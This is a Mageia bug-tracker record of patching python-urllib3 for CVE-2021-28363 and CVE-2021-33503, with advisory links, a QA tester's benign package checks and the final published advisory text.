Bug 29041 - python-urllib3 new security issues CVE-2021-28363 and CVE-2021-33503
Summary: python-urllib3 new security issues CVE-2021-28363 and CVE-2021-33503
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 8
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA8-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2021-05-30 04:15 CEST by David Walser
Modified: 2021-07-27 22:23 CEST (History)
7 users (show)

See Also:
Source RPM: python-urllib3-1.26.2-1.mga8.src.rpm
CVE: CVE-2021-28363, CVE-2021-33503
Status comment:


Attachments

Description David Walser 2021-05-30 04:15:15 CEST
Fedora has issued an advisory on May 24:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4S65ZQVZ2ODGB52IC7VJDBUK4M5INCXL/

That is for python-pip (see Bug 29010), but it fixes an issue in python-urllib3, which is bundled in pip.

The issue is fixed upstream in 1.26.4.

Mageia 8 is also affected.
David Walser 2021-05-30 04:15:40 CEST

See Also: (none) => https://bugs.mageia.org/show_bug.cgi?id=29010
Whiteboard: (none) => MGA8TOO
Status comment: (none) => Fixed upstream in 1.26.4

David Walser 2021-05-30 04:16:03 CEST

CC: (none) => bruno

Comment 1 Aurelien Oudelet 2021-05-30 16:14:18 CEST
Assigning.

Assignee: bugsquad => python
CC: (none) => ouaurelien

Comment 2 David Walser 2021-06-21 19:40:57 CEST
SUSE has issued an advisory on June 18:
https://lists.suse.com/pipermail/sle-security-updates/2021-June/009038.html

The issue is fixed upstream in 1.26.5:
https://github.com/advisories/GHSA-q2q7-5pp4-w6pg

Mageia 7 and Mageia 8 are also affected.

Summary: python-urllib3 new security issue CVE-2021-28363 => python-urllib3 new security issues CVE-2021-28363 and CVE-2021-33503
Status comment: Fixed upstream in 1.26.4 => Fixed upstream in 1.26.5
Whiteboard: MGA8TOO => MGA8TOO, MGA7TOO

Comment 3 David Walser 2021-06-21 20:02:34 CEST
Fedora has issued an advisory for CVE-2021-33503 on June 19:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JWEE334W43EIJUKSMQSEH6ML7VU57K5B/
Comment 4 David Walser 2021-06-27 22:02:34 CEST
pip 21.1 updates urllib3 to 1.26.4, but as of pip 21.1.2, urllib3 still hasn't been updated to 1.26.5 to address CVE-2021-33503.  The python-urllib3 package itself has been updated to 1.26.5 in Cauldron.
Comment 5 David Walser 2021-06-27 22:10:01 CEST
The first part of the patch in this commit:
https://src.fedoraproject.org/rpms/mingw-python-urllib3/c/370b56fc70416e75e1ad05ec4449ae7624e0e991?branch=f34

can be added to patch pip-21.1.2/src/pip/_vendor/urllib3

but I'm sure it'll be fixed upstream in pip before long.

For slightly older pips, Fedora's patch could be used as a starting point:
https://src.fedoraproject.org/rpms/python-pip/c/e36c561614df9a20c4ec1b9b9100f271d210ceb9?branch=f34
Comment 6 David Walser 2021-07-01 18:56:09 CEST
Removing Mageia 7 from whiteboard due to EOL:
https://blog.mageia.org/en/2021/06/08/mageia-7-will-reach-end-of-support-on-30th-of-june-the-king-is-dead-long-live-the-king/

Whiteboard: MGA8TOO, MGA7TOO => MGA8TOO

Comment 7 David Walser 2021-07-04 21:17:06 CEST
Fedora has issued an advisory for this today (July 4):
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FMUGWEAUYGGHTPPXT6YBD53WYXQGVV73/
Comment 8 David Walser 2021-07-12 17:25:13 CEST
openSUSE has issued an advisory for the second CVE on July 10:
https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/NYARUF6IH56FOIKBV7PTO7AXODL5GKNT/
Comment 9 David Walser 2021-07-23 17:50:23 CEST
python-pip in Cauldron has been patched to fix CVE-2021-33503.

Source RPM: python-urllib3-1.26.2-3.mga9.src.rpm => python-urllib3-1.26.2-1.mga8.src.rpm
Whiteboard: MGA8TOO => (none)
CC: (none) => mageia
Version: Cauldron => 8

Comment 10 Jani Välimaa 2021-07-26 16:37:21 CEST
Pushed python-urllib3-1.26.5-1.mga8 to core/udpates_testing.

SRPM(S):
python-urllib3-1.26.5-1.mga8

RPM(S):
python3-urllib3-1.26.5-1.mga8

CC: (none) => jani.valimaa
Assignee: python => qa-bugs

Comment 11 David Walser 2021-07-26 16:40:13 CEST
Thanks Jani!

Some more references:
https://github.com/urllib3/urllib3/releases/tag/1.26.3
https://github.com/urllib3/urllib3/releases/tag/1.26.4
https://github.com/urllib3/urllib3/releases/tag/1.26.5

Status comment: Fixed upstream in 1.26.5 => (none)

Comment 12 Len Lawrence 2021-07-27 01:01:26 CEST
mga8, x64

CVE-2021-33503
https://src.fedoraproject.org/rpms/python-urllib3/pull-request/16
Shows poc test.  No poc file though (upstream - where is that?).
It appears that the poc is buried in the patch ->
https://src.fedoraproject.org/rpms/python-urllib3/pull-request/16#_1
The upstream quote shows over 4 minutes for a GET request before and a split second after the update.  We shall have to take their word for it.

$ rpm -q python3-urllib3
python3-urllib3-1.26.2-1.mga8

https://github.com/urllib3/urllib3
simple tests:
$ python
>>> import urllib3
>>> http = urllib3.PoolManager()
>>> resp = http.request("GET", "http://httpbin.org/robots.txt")
>>> resp.status
200
>>> resp.data
b'User-agent: *\nDisallow: /deny\n'
>>> exit()

Updated the package.
$ urpmq --whatrequires python3-urllib3 | sort -u
buku
meteo-qt
python3-botocore
python3-conda
python3-coveralls
python3-dulwich
python3-requests
python3-requests-unixsocket
python3-responses
python3-selenium
sansimera-qt
transifex-client

Installed buku, a browser bookmarks manager.
$ buku --ai
<Answered questions and picked Firefox browser.  Bookmarks imported to database.>
$ strace -o buku.trace buku
a <open all results in browser>
 s extrasolar

1. The Extrasolar Planets Encyclopaedia [153]
   > http://exoplanet.eu/
   # 2021jul26,menu

2. systemic [378]
   > http://www.oklo.org/
   # 2021jul26,astro,extrasolar,menu

3. systemic - Downloadable Console [379]
   > http://www.oklo.org/?page_id=86
   # 2021jul26,astro,extrasolar,menu

4. HubbleSite - NewsCenter - 'Survivor' Planets: Astronomers Witness First Steps of Planet Growth - and Destruction (04/26/2001) - Introduction [380]
   > http://hubblesite.org/newscenter/archive/releases/2001/13
   # 2021jul26,astro,extrasolar,menu

<and so on>

0 4
<That opened https://hubblesite.org/news/news-releases which contained the item required>

s mageia updates <returned 164 results>

0 6 <switched to Mageia identity management>

^D to exit.

That works as far as it went.

$ grep urllib3 buku.trace
<lots of entries>
openat(AT_FDCWD, "/usr/lib/python3.8/site-packages/urllib3/__pycache__/__init__.cpython-38.pyc", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/usr/lib/python3.8/site-packages/urllib3", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3

This will do.

CC: (none) => tarazed25
Whiteboard: (none) => MGA8-64-OK

Comment 13 Thomas Andrews 2021-07-27 03:42:54 CEST
Validating.

CC: (none) => andrewsfarm, sysadmin-bugs
Keywords: (none) => validated_update

Comment 14 Aurelien Oudelet 2021-07-27 20:41:20 CEST
type: security
subject: Updated python-urllib3 package fixes security vulnerabilities
CVE:
 - CVE-2021-28363
 - CVE-2021-33503
src:
  8:
   core:
     - python-urllib3-1.26.5-1.mga8
description: |
  The urllib3 library 1.26.x before 1.26.4 for Python omits SSL certificate
  validation in some cases involving HTTPS to HTTPS proxies. The initial
  connection to the HTTPS proxy (if an SSLContext isn't given via proxy_config)
  doesn't verify the hostname of the certificate. This means certificates for
  different servers that still validate properly with the default urllib3
  SSLContext will be silently accepted (CVE-2021-28363).
  
  An issue was discovered in urllib3 before 1.26.5. When provided with a URL
  containing many @ characters in the authority component, the authority regular
  expression exhibits catastrophic backtracking, causing a denial of service if
  a URL were passed as a parameter or redirected to via an HTTP redirect
  (CVE-2021-33503).
references:
 - https://bugs.mageia.org/show_bug.cgi?id=29041
 - https://github.com/urllib3/urllib3/releases/tag/1.26.3
 - https://github.com/urllib3/urllib3/releases/tag/1.26.4
 - https://github.com/urllib3/urllib3/releases/tag/1.26.5
 - https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/NYARUF6IH56FOIKBV7PTO7AXODL5GKNT/
 - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FMUGWEAUYGGHTPPXT6YBD53WYXQGVV73/
 - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JWEE334W43EIJUKSMQSEH6ML7VU57K5B/
 - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4S65ZQVZ2ODGB52IC7VJDBUK4M5INCXL/

Keywords: (none) => advisory
CVE: (none) => CVE-2021-28363, CVE-2021-33503

Comment 15 Mageia Robot 2021-07-27 22:23:27 CEST
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2021-0377.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED


Note You need to log in before you can comment on or make changes to this bug.